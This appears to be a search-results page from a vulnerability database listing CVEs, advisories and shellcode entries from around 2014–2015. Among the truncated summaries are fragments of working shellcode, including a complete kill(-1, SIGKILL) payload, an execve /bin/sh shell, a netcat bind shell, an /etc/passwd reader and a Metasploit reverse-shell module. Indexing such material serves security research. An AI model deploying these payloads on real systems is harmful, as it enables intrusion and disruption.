Lucene search
+L

988 matches found

zdt
zdt
•added 2015/06/24 12:00 a.m.•43 views

linux/x86-64 execve(/bin/sh) 30 bytes

/ William Borskey 2015 Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm. 1 ; int execveconst char filename, char const argv, char const envp; 2 BITS 64 3 4 section .text 5 global start 6 7 start: 8 mov rcx, 0x1168732f6e69622f ;move the...

7.4AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2015/06/24 12:00 a.m.•36 views

linux/x86-64 execve/bin/sh 30 bytes

linux/x86-64 execve/bin/sh 30 bytes. Shellcode exploit for linx86-64 platform / William Borskey 2015 Compile with: gcc -fno-stack-protector -z execstack Shellcode written in 64 bit Intel assembly using yasm. 1 ; int execveconst char filename, char const argv, char const envp; 2 BITS 64 3 4 sectio...

7.4AI score
SaveExploits0
zdt
zdt
•added 2015/06/24 12:00 a.m.•30 views

linux/x86 - Netcat BindShell Port 5555 - 60 bytes

Greetz : BombermanLeader Author : B3mB4m Concat : Do not disturb - Bomberman Netcat openbsd version which is default installed in ubuntu have not "-e" option. So if you are trying to test on ubuntulike me you must change version to traditional. Typing this: 1 sudo update-alternatives --config nc ...

0.1AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2015/06/16 12:00 a.m.•25 views

Linux/x86 - /etc/passwd Reader 58 bytes

Linux/x86 - /etc/passwd Reader 58 bytes. Shellcode exploit for linux platform Linux/x86 - /etc/passwd Reader - 58 bytes Greetz : BombermanLeader,wiremask.eu Author : B3mB4m Concat : Do not disturb - Bomberman Bu adamı geçmeden konuşmaya iznim yok.Iki yıl sonra görüşmek üzre : Info File descriptor...

0.1AI score
SaveExploits0
CNVD
CNVD
•added 2015/05/28 12:00 a.m.•11 views

Moxa VPort ActiveX SDK Plus Stack Buffer Overflow Vulnerability

Moxa's VPort SDK PLUS, including CGI command, ActiveX control and API libraries, allows third-party developers to easily integrate customized monitoring applications. Moxa VPort ActiveX SDK Plus suffers from a stack buffer overflow vulnerability. A remote attacker can exploit the vulnerability by...

7.5CVSS7.5AI score0.02373EPSS
SaveExploits0References1
NVD
NVD
•added 2015/05/26 3:59 p.m.•42 views

CVE-2015-0986

Multiple stack-based buffer overflows in Moxa VPort ActiveX SDK Plus before 2.8 allow remote attackers to insert assembly-code lines via vectors involving a regkey 1 set or 2 get command...

7.5CVSS6.7AI score0.02373EPSS
SaveExploits0References4
Prion
Prion
•added 2015/05/26 3:59 p.m.•28 views

Stack overflow

Multiple stack-based buffer overflows in Moxa VPort ActiveX SDK Plus before 2.8 allow remote attackers to insert assembly-code lines via vectors involving a regkey 1 set or 2 get command...

7.5CVSS7.3AI score0.02373EPSS
SaveExploits0References4Affected Software1
zdt
zdt
•added 2015/05/16 12:00 a.m.•27 views

linux/x86 - exit(0) - 6 bytes

/ linux/x86 exit0 - 6 bytes Febriyanto Nugroho / include char shellcode = "\xf7\xf0" "\xcd\x80" "\xeb\xfa"; int mainint argc, char argv asm"jmp %0;" : "=m" shellcode;...

0.1AI score
SaveExploits0
zdt
zdt
•added 2015/05/05 12:00 a.m.•42 views

linux/x86 kill(-1, SIGKILL) - 10 bytes

// linux/x86 kill-1, SIGKILL - 10 bytes // Febriyanto Nugroho include char shellcode = "\x6a\x25" \ push $0x25 "\x58" \ pop %eax "\x6a\xff" \ push $0xffffffff = -1 "\x5b" \ pop %ebx "\xb1\x09" \ mov $0x9,%cl "\xcd\x80"; \ int $0x80 int mainint argc, char argv asm"jmp %0;" : "=m" shellcode;...

0.7AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2015/05/04 12:00 a.m.•47 views

linux/x86 - exit0 6 bytes

linux/x86 - exit0 6 bytes. Shellcode exploit for linx86 platform / linux/x86 exit0 - 6 bytes Febriyanto Nugroho / include char shellcode = "\xf7\xf0" "\xcd\x80" "\xeb\xfa"; int mainint argc, char argv asm"jmp %0;" : "=m" shellcode;...

0.1AI score
SaveExploits0
Metasploit
Metasploit
•added 2015/05/02 6:52 p.m.•44 views

BSD x64 Command Shell, Reverse TCP Inline

Connect back to attacker and spawn a command shell This module requires Metasploit: https://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework module MetasploitModule CachedSize = 81 include Msf::Payload::Single include Msf::Payload::Bsd include...

7AI score
SaveExploits0
Packet Storm
Packet Storm
•added 2015/04/30 12:00 a.m.•81 views

TestDisk 6.14 Check_OS2MB Stack Buffer Overflow

, , . '.' '. ', . , '. , .', , / / / \ \ ==/ /\ \ / / \ / \ / / | \ \ Y Y \ / /| / \ /||| / / /.-. / /:wq x.0 '=.|w|.=' =''"''=. presents.. TestDisk 6.14 CheckOS2MB Stack Buffer Overflow Affected versions: TestDisk 6.14 - Linux, Windows and Mac OSX PDF:...

0.9AI score
SaveExploits0
Exploit DB
Exploit DB
•added 2015/04/08 12:00 a.m.•26 views

Linux x86 - Egg-hunter 20 bytes

Linux x86 - Egg-hunter 20 bytes. Shellcode exploit for linx86 platform ; Egg Hunter 20 bytes ; - searches from current addr towards lower memory ; - marker: 0x5159 push ecx,pop ecx ; Paw Petersen, SLAE-656 ; https://www.pawpetersen.dk/slae-assignment-3-egg-hunter-linux-x86/ global start section...

7.4AI score
SaveExploits0
Openbugbounty
Openbugbounty
•added 2015/03/27 11:27 p.m.•10 views

assembly.state.ny.us XSS vulnerability

Open Bug Bounty ID: OBB-56919 Description| Value ---|--- Affected Website:| assembly.state.ny.us Vulnerable Application:| Custom Code Vulnerability Type:| XSS Cross Site Scripting / CWE-79 CVSSv3 Score:| 6.1 CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N Remediation Guide:| OWASP XSS Prevention Che...

6.4AI score
SaveExploits0
myhack58
myhack58
•added 2015/03/01 12:00 a.m.•26 views

Security vulnerability is the essence of myth of the battle to compile code-bug warning-the black bar safety net

0x00 Preface Currently more popular but also more efficient mining of vulnerabilities is Fuzzing, of course, this also needs to take the time to write Fuzzing programs. However, not every things are necessary to write Fuzzing programs,not every thing can go to Fuzzing, so still have to continue t...

SaveExploits0
ICS
ICS
•added 2014/12/26 7:00 a.m.•86 views

Festo CECX-X-(C1/M1) Controller Vulnerabilities

OVERVIEW This advisory was originally posted to the US-CERT secure Portal library on March 25, 2014, and is now being released to the NCCIC/ICS-CERT web site. K. Reid Wightman of IOActive, Inc. has identified vulnerabilities in Festo’s CECX-X-C1 and CECX-X-M1 controllers. Festo has decided not to...

9.3CVSS7.9AI score0.03345EPSS
SaveExploits0References10
Fedora
Fedora
•added 2014/12/06 10:04 a.m.•39 views

[SECURITY] Fedora 21 Update: avr-binutils-2.24-4.fc21

This is a Cross Compiling version of GNU binutils, which can be used to assemble and link binaries for the avr platform, instead of for the native arm platform...

7.5CVSS3.1AI score0.07486EPSS
SaveExploits7
NVD
NVD
•added 2014/09/29 1:55 a.m.•19 views

CVE-2014-6802

The First Assembly NLR aka com.subsplash.thechurchapp.firstassemblynlr application 2.8.0 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...

5.4CVSS5.9AI score0.00266EPSS
SaveExploits0References3
Cvelist
Cvelist
•added 2014/09/29 1:00 a.m.•27 views

CVE-2014-6802

The First Assembly NLR aka com.subsplash.thechurchapp.firstassemblynlr application 2.8.0 for Android does not verify X.509 certificates from SSL servers, which allows man-in-the-middle attackers to spoof servers and obtain sensitive information via a crafted certificate...

5.9AI score0.00266EPSS
SaveExploits0References3
CVE
CVE
•added 2014/09/29 1:00 a.m.•49 views

CVE-2014-6802

The First Assembly NLR Android app (package com.subsplash.thechurchapp.firstassemblynlr) version 2.8.0 does not verify X.509 certificates from SSL servers, enabling MITM attackers to spoof servers and obtain sensitive information via a crafted certificate. This is described consistently across th...

5.4CVSS6AI score0.00266EPSS
SaveExploits0References3Affected Software1
Rows per page
Query Builder